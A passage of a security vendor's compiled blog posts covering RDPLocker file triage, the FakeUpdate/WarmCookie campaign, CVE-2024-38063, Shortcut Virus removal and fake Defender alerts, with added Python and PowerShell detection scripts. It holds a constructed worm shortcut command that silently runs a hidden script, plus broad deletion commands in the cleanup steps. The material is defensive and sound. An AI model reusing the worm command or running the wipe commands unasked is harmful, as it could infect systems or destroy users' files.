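The chunk layout (encrypt 64 KiB, leave 192 KiB) and the thresholds are
assumptions chosen for the demonstration, not RDPLocker's real parameters.
"""
import math
import random
from collections import Counter

ENC_CHUNK = 64 * 1024      # assumed length of each encrypted run
SKIP_CHUNK = 192 * 1024    # assumed length of each untouched run
WINDOW = 4096              # analysis window for the entropy scan
CIPHERTEXT_ENTROPY = 7.5   # bits/byte; random data scores ~7.95, text ~4.5

# Signatures that survive only if the first bytes of the file were left alone.
MAGIC = {
    b"PK\x03\x04": "zip/docx/xlsx",
    b"Rar!\x1a\x07": "rar",
    b"7z\xbc\xaf\x27\x1c": "7z",
    b"%PDF": "pdf",
    b"ID3": "mp3",
}


def sample_plain(size=1024 * 1024):
    """Constructed 1 MiB 'document': a ZIP signature followed by low-entropy text."""
    filler = b"quarterly report, nothing to see here. "
    return (b"PK\x03\x04" + filler * (size // len(filler) + 1))[:size]


def intermittent_encrypt(data, seed=2025):
    """Model of the scheme: overwrite ENC_CHUNK bytes, skip SKIP_CHUNK bytes, repeat.
    Seeded random bytes stand in for ciphertext; this is an analysis model, not
    an encryptor, and the original bytes are not recoverable from the output."""
    rng = random.Random(seed)
    out = bytearray(data)
    pos = 0
    while pos < len(out):
        end = min(pos + ENC_CHUNK, len(out))
        out[pos:end] = rng.randbytes(end - pos)
        pos = end + SKIP_CHUNK
    return bytes(out)


def shannon_entropy(block):
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly random bytes."""
    n = len(block)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(block).values())


def encrypted_ratio(data):
    """Fraction of WINDOW-sized slices whose entropy looks like ciphertext."""
    slices = [data[i:i + WINDOW] for i in range(0, len(data), WINDOW)]
    if not slices:
        return 0.0
    hot = sum(1 for s in slices if shannon_entropy(s) >= CIPHERTEXT_ENTROPY)
    return hot / len(slices)


def classify(data):
    """Triage one file: how much is ciphertext, is the header intact, what to try."""
    ratio = encrypted_ratio(data)
    magic = next((name for sig, name in MAGIC.items() if data.startswith(sig)), None)
    if ratio == 0.0:
        verdict = "untouched: remove the .rdplocker extension and open normally"
    elif ratio < 0.5:
        verdict = "partially encrypted: try tolerant players or recovery tools"
    else:
        verdict = "mostly encrypted: rely on backups or undelete tools"
    return {"encrypted_ratio": round(ratio, 3), "magic": magic, "verdict": verdict}


if __name__ == "__main__":
    plain = sample_plain()
    print("original :", classify(plain))
    print("encrypted:", classify(intermittent_encrypt(plain)))
```

On the constructed sample, a quarter of the windows come back as ciphertext and the ZIP signature is gone, which is exactly the "partially encrypted" case the post describes; a file that was merely renamed scores 0.0 and keeps its signature. Run it against real files by reading them in binary mode and passing the bytes to classify().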

FakeUpdate Campaign Spreads WarmCookie Virus in France https://gridinsoft.com/blogs/fakeupdate-campaign-warmcookie-virus-france/ Fri, 04 Oct 2024 11:06:48 +0000

The post FakeUpdate Campaign Spreads WarmCookie Virus in France appeared first on Gridinsoft Blog.

FakeUpdate, a campaign of fake browser updates that pops up during regular Internet browsing, now targets users from France. The final target of the campaign appears to be deployment of WarmCookie backdoor, a recently discovered malware specimen.

FakeUpdate Spreads WarmCookie as Chrome, Edge Updates

Researchers at Gen Threat Labs have uncovered a campaign spreading the WarmCookie backdoor. At its core is the previously known FakeUpdate scheme, which tricks victims into downloading and running a fake web browser update. As mentioned in the introduction, these attacks currently target users in France. Besides popular browsers like Google Chrome, Mozilla Firefox and Microsoft Edge, the campaign also offers "updates" for apps like Java, VMware Workstation, Proton VPN and WebEx. To do this, attackers compromise legitimate websites or create their own that display fake browser update prompts. Anyone who follows the prompt receives a malicious program under the guise of a browser update.

FakeUpdate site screenshot
Fake browser update site

The FakeUpdate campaign itself is not new; similar campaigns have circulated before. Nor is it new for WarmCookie to use unusual spreading schemes: researchers previously saw this backdoor distributed under the guise of job offers. This time, however, aside from the new distribution method, there is an updated version of WarmCookie. It can now steal data and files, profile the device, enumerate installed programs through the Windows Registry, execute arbitrary commands via CMD, capture screenshots and install additional malware.

FakeUpdate France Campaign Details

In brief, the FakeUpdate site is designed to mimic the real one, featuring a pretty convincing URL. As of the time of writing, the site edgeupgrade[.]com was still operational. Clicking the Update button downloads an installation file “Install_x64.exe”, which is the WarmCookie backdoor. According to the researchers’ report, once launched, the malware performs standard checks for a virtual environment. If no virtual environment is detected, it gathers the system fingerprint and sends it to the attackers’ C2 server.

WarmCookie infection chain screenshot
WarmCookie infection chain (source: Gen Threat Labs)

As previously mentioned, this backdoor gives attackers broad access to the compromised system. The latest campaign observed by Gen Threat Labs shows WarmCookie upgraded with new capabilities, among them running DLLs from the temp folder and transmitting the output, and transferring and executing EXE and PowerShell files. Beyond basic data theft, attackers can use it to deliver payloads like ransomware.

As for legitimate browser updates: all modern browsers on Windows update themselves automatically. There is no need to download any installer manually; at most, the user has to restart the browser. A genuine update never arrives as an executable downloaded from a page you happened to be reading.

How to Stay Protected?

As this campaign requires several distinct user interactions, the key to avoiding it is proactive caution. The first and most effective measure is to remain vigilant while browsing. Even with highly convincing lures, be wary of any prompt to download or update software from within a page you are reading. Instead, always go to the official website of the application you intend to update, or use its built-in updater.

Another proactive option is anti-malware software with built-in Internet security. If the first precaution is overlooked, it can block access to the phishing page. GridinSoft Anti-Malware offers such protection, including an Internet Security feature, making it a strong option to consider.


Critical Windows TCP/IP Vulnerability Uncovered, Patch Now https://gridinsoft.com/blogs/critical-windows-tcp-ip-vulnerability/ Thu, 15 Aug 2024 19:16:11 +0000

The post Critical Windows TCP/IP Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

A critical vulnerability has been discovered in the Windows TCP/IP stack that allows unauthenticated remote code execution (RCE). It can be exploited remotely by sending specially crafted IPv6 packets to the target system. Successful exploitation allows an attacker to execute arbitrary code on the target, and the flaw affects all supported versions of Windows and Windows Server.

Windows TCP/IP RCE Vulnerability Impacts All Systems with IPv6 Enabled

Researcher XiaoWei from Kunlun Lab has reported the discovery of a critical remote code execution vulnerability in the Windows TCP/IP stack. The vulnerability, tracked as CVE-2024-38063, carries a CVSS score of 9.8 and can be exploited without user interaction (zero-click). While details are scarce at the time of writing, it is known that an attacker can send IPv6 packets with specially crafted payloads to the target system. CVE-2024-38063 affects all supported versions of Windows 10, Windows 11 and Windows Server. It should be noted explicitly that only systems with IPv6 enabled are exposed: the vulnerable code is in the IPv6 handling path, and the crafted packets cannot be delivered to an IPv4-only host. Since IPv6 is enabled by default on Windows, that covers most installations.

“Considering its harm, I will not disclose more details in the short term… The bug triggers before firewall handling the packet”.

Still, what has been disclosed is that CVE-2024-38063 leads to a buffer overflow, which allows an attacker to execute arbitrary code with SYSTEM privileges on the target. This could result in full control over the compromised system. I expect more details to surface as the patch reaches more systems and the researcher can publish them with less risk to users.

The impact of such a vulnerability could have been tremendous had Microsoft ignored it or missed it altogether. IPv6 is still far from universal, but experts around the world consider it the future of the Internet. Now imagine attackers able to deploy malware to any reachable device, at any time, without any user interaction. That is what a flaw like this could mean a decade from now, once IPv6 is deployed globally.

Microsoft’s Response and Mitigation

Microsoft noted that this is not the first vulnerability of this kind, and attackers have actively exploited previous ones; the company expects working exploits for this one to appear eventually. Fortunately, a fix is already available in the August 2024 Patch Tuesday update. Additionally, organizations are advised to monitor network activity and segment their networks to limit lateral movement in the event of a compromise.

Microsoft also suggested a temporary workaround: disabling IPv6 on the affected machine. The catch is that IPv6 is enabled by default on most systems and some Windows components rely on it, so disabling it may disrupt their functionality. Note also that a host firewall is no substitute for the patch, since the researcher states that the bug triggers before the firewall handles the packet.

Shortcut Virus https://gridinsoft.com/blogs/usb-shortcut-virus/ Wed, 03 Jul 2024 05:51:37 +0000

The post Shortcut Virus appeared first on Gridinsoft Blog.

Shortcut Virus is a malicious program that tampers with the files on a disk. It is a rather old type of threat, aimed at harassing the user rather than making a profit. There are several ways to solve the issue, manual as well as with specialized software.

What is Shortcut Virus?

Shortcut Virus is a type of malware that makes your data look lost by turning every file into a shortcut. It modifies the file layout on a USB drive, replacing real files and folders with .lnk shortcuts that carry the same icons and names. When the user opens one of these shortcuts, it launches the malware instead of the file. The original files are usually still on the drive, marked with the hidden and system attributes so that Explorer does not show them.

Shortcut Virus Infection Chain

The virus spreads primarily through USB devices: when an infected computer sees a new drive, it copies its executable onto it. This file is usually saved in the root directory, disguised as a familiar item using common icons and names such as "My Documents" or "Recycle Bin", and often hidden with the same attributes as the stolen files. On the computer side, it adds itself to the Run keys in the Windows Registry so that it starts with every logon. The .lnk files are the key element of the chain: older variants also relied on autorun.inf, but modern Windows ignores AutoRun on USB drives, so today it is the shortcuts, each of which launches the hidden executable before opening the real file, that carry the infection from machine to machine.

Some users want to re-use old drives, that potentially contain this malware. But for many, it is a risk to plug it into their current computer and infect it. And that leaves the question: how to safely recover files or format a hard drive?

Question about Shortcut Virus
Question from a user on a Reddit forum.

How Is Shortcut Virus Dangerous?

Shortcut Virus poses a serious threat to users who regularly use removable media. The main dangers associated with this virus include:

  • The worst part is that the virus can also hide or delete the original files on the USB drive. This often results in the loss of important information that may be difficult or impossible to recover.
  • Shortcut Virus easily and stealthily spreads from one device to another, infecting all USB devices connected to the infected computer.
  • Shortcut Virus can function as a Trojan by collecting user’s personal data such as passwords, financial information and other sensitive data.
  • Once on system disks, the virus can disable or compromise a computer’s security, making the system more vulnerable to other malicious attacks.

How to remove Shortcut Virus?

Shortcut Virus removal requires a careful approach to not only get rid of the virus but also to restore access to the original files.

Step 1: Disable USB device autorun

To prevent the virus from automatically starting when USB devices are connected, disable USB device autorun:

  1. Open “Registry Editor” (press Win + R, type regedit and press Enter).
    run regedit
  2. Navigate to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer path.
    Registry Editor
  3. Create or modify a DWORD value named NoDriveTypeAutoRun and set the value to 0xFF to disable autorun for all disk types.
    DWORD value
Step 2: Clean up the registry

Since the virus creates registry entries to run automatically, you need to clean the registry:

  1. Open "Registry Editor" (press Win + R, type regedit and press Enter).
    run regedit
  2. Navigate to:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    Registry Editor
  3. Remove any suspicious values that launch files from the user profile, %TEMP% or a removable drive at startup. Note the file path of each one before deleting the value, so that you can delete the file itself in the next step.
    Suspicious value related to Shortcut Virus

Step 3: Manual removal

Several commands can be used to remove Shortcut Virus manually via Command Prompt, including cleaning the malicious files off the drive:

  1. Open "Command Prompt" (type cmd in the search box and click "Run as administrator" to open an elevated Command Prompt).
    cmd in the search box
  2. The virus hides the original files and replaces them with shortcuts. To make them visible again, clear the hidden, read-only and system attributes recursively:
    attrib -h -r -s /s /d G:\*.*
    "G:" is the drive letter of your USB device.
  3. Remove the shortcuts the virus created. They are the lure that relaunches the infection:
    del G:\*.lnk
    This deletes every .lnk in the root of the drive, legitimate ones included; after step 2 the real files are visible again, so nothing of value is lost.
  4. Remove the malicious executable, which is usually hidden in the USB root or in a folder named like a system item:
    del G:\*.exe
    Look at what is there first: this command deletes every executable in the root, including portable tools you may have stored on the drive.
  5. Check the C:\Windows\, C:\Windows\System32\ and C:\Users\[username]\AppData folders for the files referenced by the Run values you removed, and delete them.

Be very careful when using the command line, especially with delete commands and registry editing. Incorrect actions may damage the system.
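As an added example (not Gridinsoft's code and not one of the removal steps above), here is a Python script that parses .lnk files according to the MS-SHLLINK layout and flags the ones showing the shortcut-worm pattern described in this post: a shortcut named like a document whose real target is cmd.exe or a script host and whose arguments launch a hidden payload. It builds two sample shortcuts in memory (the drive paths and the payload name svchost.vbs are invented), so it runs offline; on a real drive you would feed it the bytes of each .lnk in the root. Deleting only the flagged shortcuts is safer than wiping every .lnk when the drive also holds legitimate ones.

```python
"""Added example (not Gridinsoft's code): parse the .lnk shortcuts a worm leaves
on a USB drive and flag the ones that launch cmd.exe/wscript.exe with a hidden
payload instead of the document they are named after. Two shortcuts are
constructed in memory following the MS-SHLLINK layout; no real drive is read.
The sample paths and the payload name are invented for the demonstration.
"""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# Interpreters a shortcut worm points at instead of the real file.
LAUNCHERS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
PAYLOAD_HINTS = (".vbs", ".js", ".exe", ".bat", ".ps1", "start ")


def build_lnk(target, args="", rel_path=""):
    """Minimal shell link: header, LinkInfo with a LocalBasePath, unicode StringData."""
    flags = HAS_LINK_INFO | IS_UNICODE | (HAS_REL_PATH if rel_path else 0) | (HAS_ARGS if args else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume = struct.pack("<IIII", 17, 3, 0, 0x10) + b"\x00"   # VolumeID with an empty label
    base = target.encode("ascii") + b"\x00"                    # LocalBasePath, NUL-terminated
    info_size = 0x1C + len(volume) + len(base) + 1
    link_info = struct.pack("<IIIIIII", info_size, 0x1C, 0x1, 0x1C,
                            0x1C + len(volume), 0, 0x1C + len(volume) + len(base))
    link_info += volume + base + b"\x00"                       # empty CommonPathSuffix

    def string_data(s):                                        # CountCharacters + UTF-16LE
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = (string_data(rel_path) if rel_path else b"") + (string_data(args) if args else b"")
    return header + link_info + body + struct.pack("<I", 0)   # TerminalBlock


def parse_lnk(blob):
    """Return target path, relative path and arguments from a shell link."""
    if len(blob) < 0x4C or blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", blob, 20)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                       # skip the PIDL; LinkInfo carries the path
        pos += 2 + struct.unpack_from("<H", blob, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        info_size, _, info_flags, _, base_off = struct.unpack_from("<IIIII", blob, pos)
        if info_flags & 0x1:                      # VolumeIDAndLocalBasePath present
            end = blob.index(b"\x00", pos + base_off)
            target = blob[pos + base_off:end].decode("latin-1")
        pos += info_size

    def read_string():
        nonlocal pos
        count = struct.unpack_from("<H", blob, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = blob[pos:pos + count * width]
        pos += count * width
        return raw.decode("utf-16-le" if width == 2 else "latin-1")

    link = {"target": target}
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                     ("working_dir", HAS_WORK_DIR), ("arguments", HAS_ARGS), ("icon", HAS_ICON)):
        link[key] = read_string() if flags & bit else ""
    return link


def is_suspicious(link):
    """A shortcut that runs an interpreter and hands it a script/executable is the worm."""
    exe = link["target"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = link["arguments"].lower()
    return exe in LAUNCHERS and any(hint in args for hint in PAYLOAD_HINTS)


def scan(shortcuts):
    """shortcuts: {filename: lnk bytes}. Returns the names that should be deleted."""
    return [name for name, blob in sorted(shortcuts.items()) if is_suspicious(parse_lnk(blob))]


# Constructed samples: one benign shortcut and one worm-style lure.
SAMPLES = {
    "Budget.xlsx.lnk": build_lnk(r"D:\Finance\Budget.xlsx", rel_path=r".\Finance\Budget.xlsx"),
    "Report.docx.lnk": build_lnk(
        r"C:\Windows\System32\cmd.exe",
        args=r'/c start wscript.exe //B "%cd%\System Volume Information\svchost.vbs" & start "" "%cd%\Report.docx"',
        rel_path=r"..\..\Windows\System32\cmd.exe"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, parse_lnk(blob))
    print("delete:", scan(SAMPLES))
```

The parser deliberately reads the target from LinkInfo rather than the item ID list, which is what Explorer shows in the shortcut's Properties dialog; a worm shortcut whose "Target" box reads cmd.exe /c start wscript.exe ... is the tell-tale sign, and the script simply automates that look.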

Shortcut Virus Remover

To remove Shortcut Virus, one of the most effective approaches is to use specialized anti-malware software that can detect and remove complex malware. One of the recommended tools for this task is Gridinsoft Anti-Malware.

Gridinsoft Anti-Malware features fast scanning and the ability to detect various types of malware, including Shortcut Virus. It also provides in-depth system and USB device scanning, which allows it to detect and remove hidden and standalone malicious files that standard antiviruses may miss.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this checks all the volumes present in the system, including hidden folders and system files. Scanning takes around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the program takes on each element: click "Advanced mode" and use the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal may take several minutes when there are many detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished


Windows Defender Security Warning https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/ Tue, 02 Jul 2024 09:14:36 +0000

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can get rid of it quickly. Here, we will explain how to remove this scam and protect yourself from other threats.

What is the Windows Defender Security Warning?

This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website, although the URL does not match the official site. The page displays a message claiming that your computer is infected with malware and that you need to call a support agent to fix the problem.

Fake Windows Defender Security Warning
Windows Defender Security Warning scam example. Red flags are highlighted in the picture.

Unfortunately, the notification looks like a legitimate Windows message, which makes it especially dangerous: many users do not even attempt to verify it with a quick search. Scammers make the pop-up as convincing as possible so that people do not suspect anything is wrong. The provided phone number connects you to a fraudulent call center. The agent will try to get you to install malware, steal your personal information, or charge you for fake services.

Why is the Windows Defender Security Warning False?

At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you are familiar with Windows Defender, you will notice differences from a genuine notification. Do not call the phone number provided in the window, because it is not a real alert. Here is why:

• It is not the Windows Defender interface. Windows Defender, now called Windows Security, is a built-in Windows application with a different interface. It never displays a browser pop-up or webpage; it uses system notifications instead.
• Strange text and typos. A banner or page showing a Microsoft Defender alert often contains odd wording and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
• Microsoft does not put support phone numbers in security alerts. Users can contact Microsoft support through the "Get Help" application if they encounter problems.

This Windows Defender security alert is flawed in both format and content. It is usually a low-effort phishing scam aiming to sell a rogue antivirus service or paid "support", which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

Causes of the Windows Defender Security Warning

There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

• You clicked on an ad that redirected you to a fake site.
• You visited a hacked website that redirected you to a fraudulent page.
• You have a malicious program installed on your device, often as a result of adware activity.

There are also many other ways you could be exposed to this fraud, depending on factors such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it: the pop-up may appear every time you open your browser.

How to Remove the Windows Defender Security Warning

Since the Windows Defender security warning appears in your browser, most of the actions to get rid of it concern the browser. These steps can help resolve the issue:

• Force close and reopen your browser without restoring the previous session.
• If the redirect to the fraudulent page persists, reset your browser (instructions below) or reinstall it completely.
• If it still continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

If you are unsure which installed application is causing the pop-ups, use anti-malware software to detect and remove the infection from your computer.

How to Clear the Browser from the Windows Defender Security Warning

Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

Remove the Windows Defender Scam from Chrome

  1. Click the three vertical dots in the top right corner and select Settings.
    How to open Chrome settings
  2. Select Reset and clean up, then Restore settings to their original defaults.
    Restore settings button
  3. Click Reset settings.
    Reset settings button for fixing the Windows Defender Security Warning

Remove the Windows Defender Scam from Firefox

  1. Click the three-line icon in the upper right corner and select Help.
    How to find Firefox reset settings
  2. Select More Troubleshooting Information.
    Next step to Firefox reset
  3. Select Refresh Firefox…, then confirm with Refresh Firefox.
    Refresh Firefox can help to remove the Windows Defender Security Warning

Remove the Windows Defender Scam from Microsoft Edge

  1. Press the three dots.
    How to reset Edge settings. Step 1
  2. Select Settings.
    How to reset Edge settings. Step 2 - Settings
  3. Click Reset settings, then Restore settings to their default values.
    Restore Edge settings to solve the Windows Defender Security Warning

Remove the Windows Defender Scam from Safari

  1. Quit Safari. A less drastic first attempt is Safari > Settings (Preferences on older macOS) > Extensions, where you remove anything you do not recognise, followed by History > Clear History…. The commands below go further: they delete Safari's caches, preferences and saved state, which also wipes your bookmarks, history and saved session, so export your bookmarks first if you need them.
  2. Open the Terminal (press ⌘ Command + Spacebar to open Spotlight, type "terminal" and press Enter).
  3. Enter these commands one at a time, pressing Enter after each. On recent macOS versions ~/Library/Safari is protected; if a command reports "Operation not permitted", grant Terminal Full Disk Access in System Settings > Privacy & Security and run it again:
    rm -Rf ~/Library/Caches/Metadata/Safari
    rm -Rf ~/Library/Caches/com.apple.Safari
    rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess
    rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery
    rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist
    rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist
    rm -Rf ~/Library/Preferences/com.apple.Safari.plist
    rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist
    rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist
    rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist
    rm -Rf ~/Library/PubSub/Database
    rm -Rf ~/Library/Safari/*
    rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState
  4. Relaunch Safari; it starts with default settings and without the saved session that kept reopening the scam page.

What to Do if the Problem Persists?

If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still on your computer. Use professional anti-malware software such as GridinSoft Anti-Malware to scan your computer and remove whatever it finds. It will also neutralize more dangerous threats that could cause severe damage to your files.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this checks all the volumes present in the system, including hidden folders and system files. Scanning takes around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. You can adjust the action the program takes on each element: click "Advanced mode" and use the drop-down menus. You can also see extended information about each detection: malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal may take several minutes when there are many detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How to Avoid Scams like the Windows Defender Security Warning

As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is much more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid it. Here are some basic tips:

• Ensure your OS and apps are up to date
• Only download apps from official websites
• Avoid clicking on random links without knowing where they will take you
• Don't download suspicious apps
• Do not open attachments in suspicious emails
• Use an ad blocker to block malicious ads
• Use advanced antivirus software

Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.


5 Methods to Fix Computer Keeps Freezing https://gridinsoft.com/blogs/how-to-prevent-my-computer-keep-freezing/ Thu, 20 Jun 2024 15:20:10 +0000

      The post 5 Methods to Fix Computer Keeps Freezing appeared first on Gridinsoft Blog.

      Have you ever been in the middle of a project when your computer suddenly freezes? Maybe the cursor stops moving, or you get the dreaded blue screen of death, forcing you to restart. If this sounds familiar, don’t worry! While it’s frustrating, you can often fix these issues yourself. The key is to understand why your PC might be freezing and then take steps to prevent it.

      This article will show you what to do if your computer keeps freezing for no obvious reason.

      Why does my computer keep freezing?

      There are several reasons why your computer might freeze or run poorly. Usually it is a software problem, or too many apps running at the same time, which causes the system to hang. We will not consider weak hardware, where the system was slow from the start. However, other problems, such as a lack of hard disk space or driver issues, can also prevent it from working correctly.

      So, what should you do when a Windows PC freezes randomly?

      Check if your computer is entirely dead-locked

      To find out whether your computer is completely frozen, try moving the mouse cursor across the screen. If it doesn’t move, your PC is locked and requires a forced reboot. You can also try pressing the “Caps Lock” key on your keyboard: if the Caps Lock indicator lights up, it’s probably a software problem that can be solved with the Windows Task Manager.

      To do this, press Ctrl+Alt+Del, open Task Manager, select the frozen program and press End Task. If the Caps Lock indicator does not respond, your computer is dead-locked and you need to restart it. Desktop computers can be rebooted with the reset button on the system unit. If you have a laptop, hold the power button for about 10 seconds to force the PC to shut down.

      Software Issues When Computer Keep Freezing

      Software issues are the most common cause of a PC freezing randomly. At some point the operating system loses control of the application, or the application tries to run in a way that Windows does not recognize. This often happens when running old programs on new versions of Windows, or vice versa. Updating the software and the OS usually corrects the problem. In some cases, reinstalling the application is the most effective way to deal with occasional software-related hangs.

      Sometimes bugs in running programs cause memory leaks. This happens when objects on the heap are no longer used, but the garbage collector cannot remove them from memory, so they stay there unnecessarily. A memory leak is harmful because it ties up memory and reduces system performance over time.

      Check for Running Resource-Intensive Software

      Sometimes programs keep running in the background even after you finish working with them. This is particularly true of virtual machines: they can sit in the background, showing no visible activity, while taking a significant share of your CPU and memory. Names to look for in Task Manager are “Vmmem” (or “Vmmemvsl”), “VirtualBox”, “Vmware-vmx” and the like. Stopping them gives your hardware a huge relief.

      Check for Malware and Viruses

      Computer freezes and crashes can be signs that your computer is infected. In some cases malware loads the system by running dozens of processes in the background, consuming your computer’s RAM and causing it to freeze. This is often coin miners’ work, as overloading the system and leaving no resources for other applications is their typical behavior. Viruses, in contrast, can corrupt system files without which the system cannot work correctly, which can cause blue screens of death. If your PC keeps freezing after rebooting, we recommend checking it for viruses with our security solution.

      GridinSoft Anti-Malware main screen

      Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

      After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

      Scan results screen

      Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are many detections. Do not interrupt it, and you will get your system as clean as new.

      Removal finished

      Processor overheating

      Because computers are sensitive to heat, a room without air conditioning on a 90-degree day can hurt your computer’s performance. You can tell if your PC is overheating by listening to its internal fans. If the cooling runs loudly, or louder than usual, you should dust the PC and replace the thermal paste on the processor.

      There is also the opposite situation: the processor is overheating but the cooling is not working, i.e. the fans are silent. In this case, carefully inspect the coolers; they may be faulty, or a connector may have come loose. At best, the processor will start to throttle; at worst, overheating can lead to a complete shutdown. Next, get some air circulating in the room and make sure the CPU vents are not clogged with dust. If the freezing stops, that was the cause of the issue.

      Multitasking Issues

      Each program on your computer requires some internal and external (hardware) resources to run. If you run many programs at once, your computer may need more memory or processing power than it has. Therefore, run only the programs you need to reduce the chance of running short on resources.

      We also recommend checking the program autorun settings and disabling autorun for unnecessary applications. This will significantly speed up the startup of your laptop. To do this, open Task Manager, go to the “startup applications” tab, and disable unnecessary applications.

      Disable useless processes
      Some programs can add themselves to autorun without your knowledge. Now you can control this.
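The Task Manager review above can also be done from PowerShell. This is an added example, not code from the Gridinsoft post: it lists every autorun entry (Run/RunOnce keys and the Startup folders) with the file it launches, whether that file exists, whether it is signed, and whether it lives in a user profile folder such as %TEMP% or %APPDATA%, which is where software usually "writes itself into autorun". It assumes Windows 10/11 with PowerShell 5.1 or later and is read-only; disabling an entry is still done in Task Manager.

```powershell
# Added example (not from the Gridinsoft post). Read-only review of autorun
# entries. Assumes Windows 10/11 and PowerShell 5.1 or later.

function Get-ExecutablePath {
    # Extract the bare executable from an autorun command line, handling both
    #   "C:\Program Files\App\app.exe" --flag   and   C:\tools\app.exe --flag
    param([string]$CommandLine)
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        $exe = if ($end -gt 1) { $cmd.Substring(1, $end - 1) } else { $cmd.Trim('"') }
    } else {
        $exe = ($cmd -split '\s+')[0]
    }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Get-AutorunEntries {
    # Win32_StartupCommand covers the Run/RunOnce registry keys and the
    # per-user and all-users Startup folders in a single query.
    $profileDirs = @($env:TEMP, $env:APPDATA, $env:LOCALAPPDATA)
    Get-CimInstance -ClassName Win32_StartupCommand | ForEach-Object {
        $exe    = Get-ExecutablePath -CommandLine $_.Command
        $exists = [bool]$exe -and (Test-Path -LiteralPath $exe -PathType Leaf)
        $signer = 'file not found'
        if ($exists) {
            # Authenticode status: a valid signature names the publisher;
            # unsigned entries deserve a second look before you trust them.
            $sig = Get-AuthenticodeSignature -LiteralPath $exe
            $signer = if ($sig.Status -eq 'Valid') { $sig.SignerCertificate.Subject } else { "unsigned ($($sig.Status))" }
        }
        # Entries launched from a user-writable profile folder are where
        # programs add themselves to autorun without asking.
        $inProfile = @($profileDirs | Where-Object { $exe -like "$_\*" }).Count -gt 0

        [PSCustomObject]@{
            Name         = $_.Name
            Location     = $_.Location   # registry key path or 'Startup' folder
            User         = $_.User
            Path         = $exe
            Exists       = $exists
            InProfileDir = $inProfile
            Signer       = $signer
        }
    }
}

# Profile-folder entries first, then grouped by where they are registered.
Get-AutorunEntries |
    Sort-Object InProfileDir, Location, Name -Descending |
    Format-Table Name, Location, User, Exists, InProfileDir, Signer, Path -AutoSize -Wrap
```

Entries you have already disabled in Task Manager still appear in this list, since the query reads the registered commands, not Task Manager's enabled/disabled state.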

      Driver Issues

